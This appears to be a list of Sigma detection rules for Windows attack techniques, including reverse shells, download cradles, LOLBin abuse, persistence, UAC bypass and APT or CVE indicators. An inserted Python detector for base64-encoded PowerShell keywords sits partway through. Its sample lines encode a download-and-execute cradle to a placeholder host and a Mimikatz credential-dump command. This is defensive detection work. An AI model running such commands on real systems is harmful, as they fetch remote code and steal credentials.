Potential Powershell ReverseShell ConnectionhighDetects usage of the "TcpClient" class, which can be abused to establish remote connections and reverse shells, as seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and others.
Run PowerShell Script from Redirected Input StreamhighDetects PowerShell script execution via input stream redirect
Suspicious PowerShell Invocation From Script EnginesmediumDetects suspicious powershell invocations from interpreters or unusual programs
Change PowerShell Policies to an Insecure LevelmediumDetects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
Service StartupType Change Via PowerShell Set-ServicemediumDetects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
Exchange PowerShell Snap-Ins UsagehighDetects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
Suspicious PowerShell Download and Execute PatternhighDetects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend matches the strings case-insensitively)
Suspicious PowerShell Parameter SubstringhighDetects suspicious PowerShell invocation with a parameter substring
Suspicious PowerShell Parent ProcesshighDetects a suspicious or uncommon parent processes of PowerShell
PowerShell Script Run in AppDatamediumDetects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
PowerShell DownloadFilehighDetects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
Net WebClient Casing AnomalieshighDetects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
Suspicious XOR Encoded PowerShell CommandmediumDetects presence of a potentially xor encoded powershell command
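The encoded-PowerShell rules listed above (base64 encoded IEX, "Invoke-", "FromBase64String", WMI classes) all rest on one property of base64: a keyword encoded as UTF-16LE (what "-EncodedCommand" expects) or UTF-8 has exactly three base64 spellings, one per byte alignment, so a rule that lists all three substrings matches without decoding anything. The script below is an added example written for this report, not code from SigmaHQ or from any of the rules; the keyword list, the argument regex and the sample command lines are constructed for illustration (example.invalid is a reserved placeholder domain).

```python
"""Detect base64-encoded PowerShell keywords in process command lines.

Added example, not part of the report or of any Sigma rule. It reproduces the
"base64 offset" idea behind the encoded-PowerShell rules: a keyword encoded as
UTF-16LE or UTF-8 has three base64 spellings depending on how many bytes
precede it, so a substring detector needs all three per keyword and encoding.
"""
import base64
import re
from typing import List, Optional, Tuple

# Leading / trailing base64 characters whose value depends on neighbouring
# bytes; they are trimmed so the remaining substring matches in any context.
HEAD_DROP = {0: 0, 1: 2, 2: 3}  # keyed by prefix-byte offset (0, 1, 2)
TAIL_DROP = {0: 0, 1: 3, 2: 2}  # keyed by (offset + len(keyword_bytes)) % 3

# Keywords carry some context ("IEX (New-Object" rather than "IEX"): a bare
# three-letter keyword yields three-character substrings that match by chance.
# Constructed list for this example, not a rule's string list.
KEYWORDS = ("IEX (New-Object", "Invoke-Expression", "Invoke-Mimikatz",
            "FromBase64String", "Net.WebClient")
ENCODINGS = ("utf-16-le", "utf-8")


def base64_variants(keyword: str, encoding: str = "utf-16-le") -> List[str]:
    """Return the three context-independent base64 substrings of `keyword`."""
    raw = keyword.encode(encoding)
    variants = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + raw).decode("ascii")
        tail = TAIL_DROP[(offset + len(raw)) % 3]
        variants.append(enc[HEAD_DROP[offset]:len(enc) - tail])
    return variants


# Precomputed once, the way a SIEM compiles a rule's string list.
SIGNATURES = {(kw, enc): base64_variants(kw, enc)
              for kw in KEYWORDS for enc in ENCODINGS}


def find_encoded_keywords(command_line: str) -> List[Tuple[str, str]]:
    """(keyword, encoding) pairs whose base64 form occurs in the command line.

    Equivalent to a Sigma `CommandLine|contains` list: no decoding needed, and
    case-sensitive because base64 is.
    """
    return [(kw, enc) for (kw, enc), variants in SIGNATURES.items()
            if any(v in command_line for v in variants)]


# -e / -ec / -enc / -EncodedCommand: powershell.exe accepts any unambiguous prefix.
ENC_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Decode the -EncodedCommand payload (UTF-16LE) for analyst review, if any."""
    m = ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _b64(script: str, encoding: str) -> str:
    return base64.b64encode(script.encode(encoding)).decode("ascii")


# Constructed sample command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    # download cradle passed via -enc, UTF-16LE as powershell.exe expects
    "powershell.exe -nop -w hidden -enc " + _b64(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
        "utf-16-le"),
    # UTF-8 payload decoded inline with FromBase64String
    "powershell.exe -c \"iex ([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('" + _b64("Invoke-Mimikatz -DumpCreds", "utf-8")
    + "')))\"",
    # benign encoded command: must produce no hits
    "powershell.exe -EncodedCommand " + _b64(
        "Get-Date; Get-Service | Where-Object Status -eq Running", "utf-16-le"),
]


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(find_encoded_keywords(line) or "no encoded keyword",
              "|", decode_encoded_command(line))
```

Run it as a script to see the hits beside the decoded "-EncodedCommand" payloads. Two practical points the rule descriptions above leave implicit: the substrings are case-sensitive, so a case-insensitive backend (see the note on the download-and-execute rule) must not be applied to them, and short keywords produce short substrings that fire by chance, which is why the real rules pair "IEX" with the characters that follow it.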
Arbitrary File Download Via PresentationHost.EXEmediumDetects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
XBAP Execution From Uncommon Locations Via PresentationHost.EXEmediumDetects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files and bypass application whitelisting (AWL)
Visual Studio NodejsTools PressAnyKey Arbitrary Binary ExecutionmediumDetects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
PUA - AdvancedRun ExecutionmediumDetects the execution of AdvancedRun utility
PUA - CsExec ExecutionhighDetects the use of the lesser known remote execution tool named CsExec a PsExec alternative
PUA - NirCmd ExecutionmediumDetects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
PUA - NirCmd Execution As LOCAL SYSTEMhighDetects the use of NirCmd tool for command execution as SYSTEM user
PUA - NSudo ExecutionhighDetects the use of NSudo tool for command execution
PUA - Radmin Viewer Utility ExecutionmediumDetects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
PUA - RunXCmd ExecutionhighDetects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
PUA - Wsudo Suspicious ExecutionhighDetects usage of wsudo (Windows Sudo Utility), a tool that lets the user execute programs with different permissions (System, TrustedInstaller, Administrator, etc.)
Python Inline Command ExecutionmediumDetects execution of python using the "-c" flag. This could be used as a way to launch a reverse shell or execute live python code.
Python Spawning Pretty TTY on WindowshighDetects Python spawning a pseudo-terminal (pty)
Query Usage To Exfil DatamediumDetects usage of "query.exe", a system binary, to collect information such as "sessions" and "processes" for later use
Suspicious Greedy Compression Using Rar.EXEhighDetects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
Suspicious RASdial ActivitymediumDetects suspicious process related to rasdial.exe
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLIhighDetects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
Regsvr32 DLL Execution With Uncommon ExtensionmediumDetects a "regsvr32" execution where the DLL doesn't contain a common file extension.
Remote Access Tool - AnyDesk Execution With Known Revoked Signing CertificatemediumDetects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the AnyDesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of AnyDesk using the compromised certificate. This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
Remote Access Tool - ScreenConnect Remote Command ExecutionlowDetects the execution of a system command via the ScreenConnect RMM service.
Renamed CURL.EXE ExecutionmediumDetects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
Renamed FTP.EXE ExecutionmediumDetects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
Renamed Jusched.EXE ExecutionhighDetects the execution of a renamed "jusched.exe" as seen used by the cobalt group
Renamed NirCmd.EXE ExecutionhighDetects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
Renamed PingCastle Binary ExecutionhighDetects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
Visual Studio NodejsTools PressAnyKey Renamed ExecutionmediumDetects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
Potential Renamed Rundll32 ExecutionhighDetects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
Renamed PsExec Service ExecutionhighDetects suspicious launch of a renamed version of the PSEXESVC service, which is not often used by legitimate administrators
Ruby Inline Command ExecutionmediumDetects execution of ruby using the "-e" flag. This could be used as a way to launch a reverse shell or execute live ruby code.
Mshtml.DLL RunHTMLApplication Suspicious UsagehighDetects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
Shell32 DLL Execution in Suspicious DirectoryhighDetects shell32.dll executing a DLL in a suspicious directory
Potential ShellDispatch.DLL Functionality AbusemediumDetects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
Potentially Suspicious Rundll32.EXE Execution of UDL FilemediumDetects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
Rundll32 UNC Path ExecutionhighDetects rundll32 execution where the DLL is located on a remote location (share)
Suspicious Modification Of Scheduled TaskshighDetects when an attacker tries to modify an already existing scheduled task to run from a suspicious location. Attackers can create a simple-looking task in order to avoid detection on creation, as creation is often the most closely monitored event, and instead modify the task afterwards to include their malicious payload
Rundll32 Execution Without ParametershighDetects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
Suspicious Schtasks Execution AppData FolderhighDetects the creation of a schtask that executes a file from C:\Users\\AppData\Local
Scheduled Task Creation Via Schtasks.EXElowDetects the creation of scheduled tasks by user accounts via the "schtasks" utility.
Suspicious Scheduled Task Creation Involving Temp FolderhighDetects the creation of scheduled tasks that involves a temporary folder and runs only once
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXEmediumDetects Schtask creations that point to a suspicious folder or an environment variable often used by malware
Schtasks From Suspicious FoldershighDetects scheduled task creations that have suspicious action command and folder combinations
Suspicious Scheduled Task Name As GUIDmediumDetects creation of a scheduled task with a GUID like name
Uncommon One Time Only Scheduled Task At 00:00highDetects scheduled task creation events that include suspicious actions, and is run once at 00:00
Potential Persistence Via Powershell Search Order Hijacking - TaskhighDetects suspicious PowerShell execution via a scheduled task where the command ends with suspicious flags that hide the PowerShell instance instead of executing scripts or commands. This could be a sign of persistence via the PowerShell "Get-Variable" technique as seen used by Colibri Loader
Scheduled Task Executing Payload from RegistrymediumDetects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
Scheduled Task Executing Encoded Payload from RegistryhighDetects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
Suspicious Schtasks Schedule TypeshighDetects scheduled task creation or modification with a suspicious schedule type
Suspicious Schtasks Schedule Type With High PrivilegesmediumDetects scheduled task creation or modification to be run with high privileges on a suspicious schedule type
Suspicious Command Patterns In Scheduled Task CreationhighDetects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
Schtasks Creation Or Modification With SYSTEM PrivilegeshighDetects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
Script Event Consumer Spawning ProcesshighDetects a suspicious child process of Script Event Consumer (scrcons.exe).
Service StartupType Change Via Sc.EXEmediumDetects the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
Uncommon Child Processes Of SndVol.exemediumDetects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
Suspicious Spool Service Child ProcesshighDetects suspicious print spool service (spoolsv.exe) child processes.
Arbitrary File Download Via Squirrel.EXEmediumDetects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Process Proxy Execution Via Squirrel.EXEmediumDetects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Arbitrary Shell Command Execution Via Settingcontent-MsmediumThe .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Potential Suspicious Browser Launch From Document Reader ProcessmediumDetects when a browser process or browser tab is launched from an application that handles document files, such as Adobe or Microsoft Office, and connects to a web application over http(s). This could indicate a possible phishing attempt.
Potential Data Exfiltration Activity Via CommandLine ToolshighDetects the use of various CLI utilities exfiltrating data via web requests
Suspicious Electron Application Child ProcessesmediumDetects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
Potentially Suspicious Electron Application CommandLinemediumDetects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
Elevated System Shell Spawned From Uncommon Parent LocationmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.
Hidden Powershell in Link File PatternmediumDetects events that appear when a user clicks on a link file with a powershell command in it
Potentially Suspicious Execution From Parent Process In Public FolderhighDetects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
Suspicious File Characteristics Due to Missing FieldsmediumDetects executables in the Downloads folder without FileVersion, Description, Product or Company fields, likely created with py2exe
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBShighDetects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine
Base64 MZ Header In CommandLinehighDetects encoded base64 MZ header in the commandline
Potential WinAPI Calls Via CommandLinehighDetects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
Potential File Download Via MS-AppInstaller Protocol HandlermediumDetects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE. The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
Suspicious Scan Loop NetworkmediumAdversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
Suspicious Program NameshighDetects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
Script Interpreter Execution From Suspicious FolderhighDetects a suspicious script execution in temporary folders or folders accessible by environment variables
Suspicious Script Execution From Temp FolderhighDetects a suspicious script executions from temporary folder
Windows Shell/Scripting Processes Spawning Suspicious ProgramshighDetects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc.
Tasks Folder EvasionhighThe Tasks folders in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script host or ANY .NET application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Weak or Abused Passwords In CLImediumDetects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline
Usage Of Web Request Commands And CmdletsmediumDetects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
Psexec ExecutionmediumDetects user accept agreement execution in psexec commandline
PsExec Service Child Process Execution as LOCAL SYSTEMhighDetects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
PsExec Service ExecutionmediumDetects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution
Potential Binary Impersonating Sysinternals ToolsmediumDetects binaries that use the same name as legitimate Sysinternals tools to evade detection
Sysprep on AppData FoldermediumDetects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
New Virtual Smart Card Created Via TpmVscMgr.EXEmediumDetects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
CMSTP UAC Bypass via COM Object AccesshighDetects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
Potential RDP Session Hijacking ActivitymediumDetects potential RDP Session Hijacking activity on Windows systems
UAC Bypass Using IDiagnostic ProfilehighDetects the "IDiagnosticProfileUAC" UAC bypass technique
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change ScriptmediumDetects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change ScripthighDetects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
VMToolsd Suspicious Child ProcesshighDetects suspicious child process creations of VMware Tools process which may indicate persistence setup
Potentially Suspicious Child Process Of VsCodemediumDetects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
Wab Execution From Non Default LocationhighDetects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non-default locations as seen with Bumblebee activity
Wab/Wabmig Unusual Parent Or Child ProcesseshighDetects unusual parents or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with Bumblebee activity
Potentially Suspicious WebDAV LNK ExecutionmediumDetects possible execution via LNK file accessed on a WebDAV server.
Potential ReflectDebugger Content Execution Via WerFault.EXEmediumDetects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
Suspicious Execution Location Of Wermgr.EXEhighDetects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
Suspicious File Download From IP Via Wget.EXEhighDetects potentially suspicious file downloads directly from IP addresses using Wget.exe
Suspicious File Download From File Sharing Domain Via Wget.EXEhighDetects potentially suspicious file downloads from file sharing domains using wget.exe
Suspicious File Download From IP Via Wget.EXE - PathshighDetects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
Suspicious WindowsTerminal Child ProcessesmediumDetects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
Add New Download Source To WingetmediumDetects usage of winget to add new additional download sources
Add Insecure Download Source To WingethighDetects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
Add Potential Suspicious New Download Source To WingetmediumDetects usage of winget to add new potentially suspicious download sources
Install New Package Via Winget Local ManifestmediumDetects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.
Potentially Suspicious Child Process Of WinRAR.EXEmediumDetects potentially suspicious child processes of WinRAR.exe.
Remote PowerShell Session Host Process (WinRM)mediumDetects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
New Process Created Via Wmic.EXEmediumDetects new process creation using WMIC via the "process call create" flag
Computer System Reconnaissance Via Wmic.EXEmediumDetects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
Hardware Model Reconnaissance Via Wmic.EXEmediumDetects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
Windows Hotfix Updates Reconnaissance Via Wmic.EXEmediumDetects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
Process Reconnaissance Via Wmic.EXEmediumDetects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
Potential Product Reconnaissance Via Wmic.EXEmediumDetects the execution of WMIC in order to get a list of firewall and antivirus products
Potential Product Class Reconnaissance Via Wmic.EXEmediumDetects the execution of WMIC in order to get a list of firewall and antivirus products
Service Reconnaissance Via Wmic.EXEmediumAn adversary might use WMI to check if a certain remote service is running on a remote device. When the query completes, service information is displayed on the screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description = The RPC server is unavailable" if the provided remote host is unreachable
Potential Unquoted Service Path Reconnaissance Via Wmic.EXEmediumDetects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
System Disk And Volume Reconnaissance Via Wmic.EXEmediumAn adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon.
WMIC Remote Command ExecutionmediumDetects the execution of WMIC to query information on a remote system
Service Started/Stopped Via Wmic.EXEmediumDetects usage of wmic to start or stop a service
Potential SquiblyTwo Technique ExecutionmediumDetects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
Suspicious WMIC Execution Via Office ProcesshighDetects an Office application calling wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).
Suspicious Process Created Via Wmic.EXEhighDetects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsvr32", etc.
Application Terminated Via Wmic.EXEmediumDetects calls to the "terminate" function via wmic in order to kill an application
Application Removed Via Wmic.EXEmediumDetects the removal or uninstallation of an application via "Wmic.EXE".
WmiPrvSE Spawned A ProcessmediumDetects WmiPrvSE spawning a process
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShellmediumDetects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
Suspicious WmiPrvSE Child ProcesshighDetects suspicious and uncommon child processes of WmiPrvSE
Potential Dropper Script Execution Via WScript/CScriptmediumDetects wscript/cscript executions of scripts located in user directories
Cscript/Wscript Potentially Suspicious Child ProcessmediumDetects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
Cscript/Wscript Uncommon Script Extension ExecutionhighDetects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
WSL Child Process AnomalymediumDetects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
Windows Binary Executed From WSLmediumDetects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships
Proxy Execution Via Wuauclt.EXEhighDetects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
Cab File Extraction Via Wusa.EXE From Potentially Suspicious PathshighDetects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
Wusa.EXE Executed By Parent Process Located In Suspicious LocationhighDetects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
CMSTP Execution Registry EventhighDetects various indicators of Microsoft Connection Manager Profile Installer execution
Registry Entries For Azorult MalwarecriticalDetects the presence of a registry key created during Azorult execution
PrinterNightmare Mimikatz Driver NamecriticalDetects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
DLL Load via LSASShighDetects a method to load DLL via LSASS process using an undocumented Registry key
Potential CobaltStrike Service Installations - RegistryhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
Blue Mockingbird - RegistryhighAttempts to detect system changes made by Blue Mockingbird
New Application in AppCompatinformationalA general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
Enable Microsoft Dynamic Data ExchangemediumEnable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
PowerShell Script Execution Policy EnabledlowDetects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
PowerShell as a Service in RegistryhighDetects that a powershell code is written to the registry as a service.
Potentially Suspicious Command Executed Via Run Dialog Box - RegistryhighDetects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
Suspicious Scripting in a WMI ConsumerhighDetects suspicious commands that are related to scripting/powershell in WMI Event Consumers
Suspicious Encoded Scripts in a WMI ConsumerhighDetects suspicious encoded payloads in WMI Event Consumers
ZxShell MalwarecriticalDetects a ZxShell start by the called and well-known function name
Turla Group Lateral MovementcriticalDetects automated lateral movement by Turla group
Turla Group Commands May 2020criticalDetects commands used by Turla group as reported by ESET in May 2020
Exploit for CVE-2017-0261mediumDetects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
Droppers Exploiting CVE-2017-11882criticalDetects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
Exploit for CVE-2017-8759criticalDetects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
Adwind RAT / JRAThighDetects javaw.exe in AppData folder as used by Adwind / JRAT
Fireball Archer InstallhighDetects Archer malware invocation via rundll32
Potential APT10 Cloud Hopper ActivityhighDetects potential process and execution activity related to APT10 Cloud Hopper operation
Turla Group Named PipescriticalDetects a named pipe used by Turla group samples
Elise Backdoor ActivitycriticalDetects Elise backdoor activity used by APT32
Sofacy Trojan Loader ActivityhighDetects Trojan loader activity as used by APT28
APT29 2018 Phishing Campaign CommandLine IndicatorscriticalDetects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
Potential MuddyWater APT ActivityhighDetects potential Muddywater APT activity
TropicTrooper Campaign November 2018highDetects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
Exploiting SetupComplete.cmd CVE-2019-1378highDetects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
Potential Baby Shark Malware ActivityhighDetects activity that could be related to Baby Shark malware
Potential Emotet ActivityhighDetects all Emotet like process executions that are not covered by the more generic rules
Potential QBot ActivitycriticalDetects potential QBot activity by looking for process executions used previously by QBot
Potential Snatch Ransomware ActivityhighDetects specific process characteristics of Snatch ransomware word document droppers
Ursnif Malware C2 URL PatterncriticalDetects Ursnif C2 traffic.
Potential Ursnif Malware Activity - RegistryhighDetects registry keys related to Ursnif malware.
Operation Wocao ActivityhighDetects activity mentioned in Operation Wocao report
Operation Wocao Activity - SecurityhighDetects activity mentioned in Operation Wocao report
DNS RCE CVE-2020-1350criticalDetects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoChighDetects the execution of the commonly used ZeroLogon PoC executable.
Suspicious PrinterPorts Creation (CVE-2020-1048)highDetects new commands that add new printer port which point to suspicious file
Exploited CVE-2020-10189 Zoho ManageEnginehighDetects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - RegistryhighDetects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
Blue MockingbirdhighAttempts to detect system changes made by Blue Mockingbird
Potential Maze Ransomware ActivitycriticalDetects specific process characteristics of Maze ransomware word document droppers
Trickbot Malware ActivityhighDetects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
Lazarus Group ActivitycriticalDetects different process execution behaviors as described in various threat reports on Lazarus group activity
UNC2452 Process Creation PatternshighDetects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
Greenbug Espionage Group IndicatorscriticalDetects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
UNC2452 PowerShell PatterncriticalDetects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
TAIDOOR RAT DLL LoadhighDetects specific process characteristics of Chinese TAIDOOR RAT malware load
CVE-2021-1675 Print Spooler Exploitation Filename PatterncriticalDetects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
Possible CVE-2021-1675 Print Spooler ExploitationhighDetects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
CVE-2021-1675 Print Spooler ExploitationcriticalDetects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
CVE-2021-1675 Print Spooler Exploitation IPC AccesscriticalDetects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
Potential Atlassian Confluence CVE-2021-26084 Exploitation AttempthighDetects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
Potential CVE-2021-26857 Exploitation AttempthighDetects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
CVE-2021-26858 Exchange ExploitationhighDetects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content
Potential CVE-2021-40444 Exploitation AttempthighDetects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
